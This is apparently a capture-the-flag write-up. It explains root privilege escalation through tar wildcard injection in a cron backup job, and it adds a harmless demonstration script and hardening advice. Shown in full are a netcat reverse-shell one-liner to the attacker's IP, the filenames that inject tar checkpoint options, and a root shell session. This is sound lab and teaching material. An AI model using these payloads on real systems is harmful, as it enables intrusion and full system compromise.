Wildcard Exploit in TAR
The issue arises because the backup command, which runs as root, calls tar with a bare wildcard (*). The shell, not tar, expands * into every filename in the directory, so any file whose name starts with -- lands on tar's command line and is parsed as an option rather than as a file to archive. GNU tar's --checkpoint-action=exec= option runs an arbitrary command, which turns control over filenames in /home/andre/backup into command execution as root.
andre@cmess:~$ cd backup/
andre@cmess:~/backup$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.180 1234 >/tmp/f' > pe.sh
This creates a shell script, pe.sh, inside the /home/andre/backup directory containing a netcat reverse shell back to the attacker's listener at 10.9.1.180:1234.
andre@cmess:~/backup$ echo "" > "--checkpoint-action=exec=sh pe.sh"
andre@cmess:~/backup$ echo "" > "--checkpoint=1"
andre@cmess:~/backup$ ll
total 24
drwxr-x--- 2 andre andre 4096 Jul 22 06:09 ./
drwxr-x--- 4 andre andre 4096 Feb 9 2020 ../
-rw-rw-r-- 1 andre andre 1 Jul 22 06:09 --checkpoint=1
-rw-rw-r-- 1 andre andre 1 Jul 22 06:09 --checkpoint-action=exec=sh pe.sh
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note*
-rw-rw-r-- 1 andre andre 73 Jul 22 06:09 pe.sh
Then create two empty files whose names are tar options: --checkpoint=1 and --checkpoint-action=exec=sh pe.sh. When the root-owned backup job runs cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *, the shell expands * to these names, so the full command tar effectively receives looks like this:
cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=sh pe.sh
The checkpoint action fires on the first checkpoint and runs sh pe.sh (resolved relative to /home/andre/backup because of the cd) with the privileges of the job's owner.
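As an added example, not part of the original writeup, the following script reproduces the wildcard injection in a throwaway directory so the mechanism can be checked without a vulnerable cron job. It replaces the reverse shell with a harmless marker file and also shows a hardened invocation (./* instead of a bare *), which goes beyond what the page covers. The names setup_dir, expanded_argv, run_tar and the .fired marker are assumptions made for this demo; the --checkpoint options require GNU tar.

```shell
#!/bin/sh
# Added example, not from the original writeup: reproduce the tar wildcard
# injection in a throwaway directory and contrast it with a hardened
# invocation. All names here (setup_dir, expanded_argv, run_tar, the .fired
# marker file) are assumptions made for this demo.

# Build a directory that mimics /home/andre/backup: one real file plus two
# empty files whose names are tar options. The checkpoint action here only
# touches a marker file instead of spawning a reverse shell.
setup_dir() {
    d=$(mktemp -d)
    printf 'backup note\n' > "$d/note"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=touch .fired"
    printf '%s\n' "$d"
}

# Print, one per line, the arguments the shell hands to tar for a bare `*`
# in the given directory. Filenames starting with "--" show up verbatim,
# which is exactly what tar will then parse as options.
expanded_argv() {
    ( cd "$1" && set -- * && printf '%s\n' "$@" )
}

# Run tar over the directory in one of two modes and report whether the
# planted checkpoint action executed (exit 0 = marker created, 1 = not).
#   vulnerable: tar -cf out.tar *      (bare wildcard, as in the backup job)
#   hardened:   tar -cf out.tar ./*    (every name begins with ./, so none
#                                        can be mistaken for an option)
run_tar() {
    dir=$1
    mode=$2
    out=$(mktemp)
    rm -f "$dir/.fired"
    case $mode in
        vulnerable) ( cd "$dir" && tar -cf "$out" *   ) >/dev/null 2>&1 ;;
        hardened)   ( cd "$dir" && tar -cf "$out" ./* ) >/dev/null 2>&1 ;;
        *) echo "unknown mode: $mode" >&2; rm -f "$out"; return 2 ;;
    esac
    rm -f "$out"
    [ -e "$dir/.fired" ]
}

# Walk through both modes and print the result; needs GNU tar for the
# --checkpoint options (bsdtar and busybox tar reject them).
demo() {
    d=$(setup_dir)
    echo "argv tar receives from a bare *:"
    expanded_argv "$d" | sed 's/^/  /'
    if tar --version 2>/dev/null | grep -q 'GNU tar'; then
        if run_tar "$d" vulnerable; then
            echo "vulnerable: checkpoint action fired (marker created)"
        else
            echo "vulnerable: checkpoint action did not fire"
        fi
        if run_tar "$d" hardened; then
            echo "hardened:   checkpoint action fired (unexpected)"
        else
            echo "hardened:   tar archived the odd filenames and ran nothing"
        fi
    else
        echo "GNU tar not found; skipping the tar runs"
    fi
    rm -rf "$d"
}

demo
```

The hardened form works because tar only treats arguments beginning with - as options; prefixing every expanded name with ./ removes that ambiguity. Passing -- before the wildcard (tar -cf out.tar -- *) achieves the same thing, as does naming the directory itself (tar -cf out.tar .) instead of globbing its contents.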
┌──(kali㉿kali)-[~/archive/thm/cmess/andre_backup]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.124.31] 38606
sh: 0: can't access tty; job control turned off
# whoami
root
# hostname
cmess
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:8f:7f:aa:35:83 brd ff:ff:ff:ff:ff:ff
inet 10.10.124.31/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::8f:7fff:feaa:3583/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise